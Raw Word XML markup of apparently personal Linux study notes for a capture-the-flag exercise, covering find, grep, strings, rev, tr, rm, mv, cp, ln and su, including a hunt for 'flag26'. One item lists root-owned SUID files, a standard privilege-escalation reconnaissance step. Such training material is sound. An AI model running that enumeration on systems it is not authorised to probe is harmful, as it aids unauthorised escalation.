      <w:r w:rsidRPr="0084205E">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -group </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> list every file owned by a specified group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772B73E" w14:textId="34A317F5" w:rsidR="00034205" w:rsidRPr="0084205E" w:rsidRDefault="00034205" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-perm” find files that have specific permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAEDA3" w14:textId="31F96A97" w:rsidR="007B2E7E" w:rsidRPr="0084205E" w:rsidRDefault="007B2E7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“Strings” command allows users to pull human-readable text from programmed items (like C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487AEF82" w14:textId="5CF34D1B" w:rsidR="007B2E7E" w:rsidRPr="0084205E" w:rsidRDefault="007B2E7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Find flag26 by searching </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>the all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> files for a string that begins with </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">4bceb </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>and is 32 characters long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE1F6D9" w14:textId="753A3246" w:rsidR="007B2E7E" w:rsidRPr="0084205E" w:rsidRDefault="007B2E7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:r w:rsidR="00377396" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Find / -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00377396" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00377396" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -type f -print0 2&gt;/dev/null | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00377396" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xargs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00377396" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -0 grep -E ‘^[a-z0-9]{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00377396" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>32}$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00377396" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’ 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7AF20" w14:textId="6828225F" w:rsidR="0025326B" w:rsidRPr="0084205E" w:rsidRDefault="00044106" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search for SUID files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BB882D" w14:textId="3EBBE250" w:rsidR="00044106" w:rsidRPr="0084205E" w:rsidRDefault="00044106" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find / -user root -perm -4000 -exec ls -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ldb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> {} </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>\;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43AE1BBF" w14:textId="6EB2B0D4" w:rsidR="00034205" w:rsidRPr="0084205E" w:rsidRDefault="00034205" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Grep – find data inside data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836B298" w14:textId="1C193AE0" w:rsidR="00B131AD" w:rsidRPr="0084205E" w:rsidRDefault="00B131AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Grep &lt;string&gt; &lt;file&gt; &lt;file2&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF4768C" w14:textId="5302F656" w:rsidR="00B131AD" w:rsidRPr="0084205E" w:rsidRDefault="00B131AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-n” tells line number of a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B12D84" w14:textId="789A7BF6" w:rsidR="004B4852" w:rsidRPr="0084205E" w:rsidRDefault="004B4852" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sed command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507F45D7" w14:textId="4F35C6DB" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“cat” – concatenate – outputs contents of files to the console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A9BCB" w14:textId="271EDA50" w:rsidR="009D3A64" w:rsidRPr="0084205E" w:rsidRDefault="009D3A64" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>More and less commands as well, especially when inspecting php files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9EBFA" w14:textId="335CC0F0" w:rsidR="007B2E7E" w:rsidRPr="0084205E" w:rsidRDefault="007B2E7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use “rev” command to output text in reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862747C" w14:textId="3E37F14B" w:rsidR="007B2E7E" w:rsidRPr="0084205E" w:rsidRDefault="007B2E7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Cat &lt;file&gt; | rev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330AE6E" w14:textId="1E511242" w:rsidR="0019714A" w:rsidRPr="0084205E" w:rsidRDefault="0019714A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remove all spaces in file</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> remove all new lines spaces </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> split by comma and get the last element in the split</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27363E9A" w14:textId="62DC35E7" w:rsidR="0019714A" w:rsidRPr="0084205E" w:rsidRDefault="0019714A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. | tr -d “\n” &gt; file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350CBF80" w14:textId="1C4928A8" w:rsidR="0019714A" w:rsidRPr="0084205E" w:rsidRDefault="0019714A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cat file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F8F1D" w14:textId="6937BD06" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“rm” – means remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5B917C" w14:textId="7736CA8B" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-r” – deletes every file in a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C052C10" w14:textId="5AC7063F" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-f” – removes warning prompts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047980C" w14:textId="06E84E0C" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“mv” – allows you to move files from one place to another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906E62C" w14:textId="5D720D19" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mv &lt;file&gt; &lt;destination&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D5C08" w14:textId="17B86D72" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. Mv &lt;file&gt; ~ </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> move file to home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B693C" w14:textId="5D4D7731" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can also rename files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE268BD" w14:textId="3432A7CB" w:rsidR="003D7307" w:rsidRPr="0084205E" w:rsidRDefault="003D7307" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Mv &lt;file&gt; ~/&lt;new name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BF648" w14:textId="2FEA7B3D" w:rsidR="00FD3CBC" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“cp” – copies file as opposed to moving it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186A103" w14:textId="1715D193" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cp &lt;file&gt; &lt;destination&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B15AEEC" w14:textId="59CFE2A7" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” – make new directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1736FD48" w14:textId="2127BD47" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;directory name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878C30D" w14:textId="38C447CF" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“touch” creates files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D039B33" w14:textId="0C951A46" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Touch b.txt – creates txt file titled “b”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D9BDD" w14:textId="51C48597" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ln” – hard links a duplicate file to its original – whatever is done to the created link is matched in the original file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45CE50" w14:textId="75630D08" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Ln source destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7DB06" w14:textId="0317EA62" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can also do symbolic linking – glorified reference to another file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47875FFB" w14:textId="35DE0EBB" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ln</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -s &lt;file&gt; &lt;destination&gt; (files will have an arrow symbol pointing to original file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B9E11" w14:textId="78ECFA87" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Running a binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654187C" w14:textId="4EC2CD4C" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="00146131" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run downloaded or user created programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AB481" w14:textId="3E722F51" w:rsidR="00146131" w:rsidRPr="0084205E" w:rsidRDefault="00146131" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Done by providing full path to the binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E05A0" w14:textId="57DD4DCA" w:rsidR="00146131" w:rsidRPr="0084205E" w:rsidRDefault="00146131" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can use relative paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFE24BC" w14:textId="569C764A" w:rsidR="00146131" w:rsidRPr="0084205E" w:rsidRDefault="00146131" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;file&gt; = /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/aa/&lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B72E354" w14:textId="4C0B3588" w:rsidR="00146131" w:rsidRPr="0084205E" w:rsidRDefault="00146131" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/&lt;file&gt; = /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/&lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65117726" w14:textId="5D6AC759" w:rsidR="00146131" w:rsidRPr="0084205E" w:rsidRDefault="00146131" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>~/&lt;file&gt; = /home/&lt;user&gt;/&lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E8762" w14:textId="040A8833" w:rsidR="00146131" w:rsidRPr="0084205E" w:rsidRDefault="00146131" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” allows change of user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2317AED9" w14:textId="5E9D6C4A" w:rsidR="00BF3D9E" w:rsidRPr="0084205E" w:rsidRDefault="00BF3D9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-s” allows specification of which is used when you login</w:t>
      </w:r>
    </w:p>
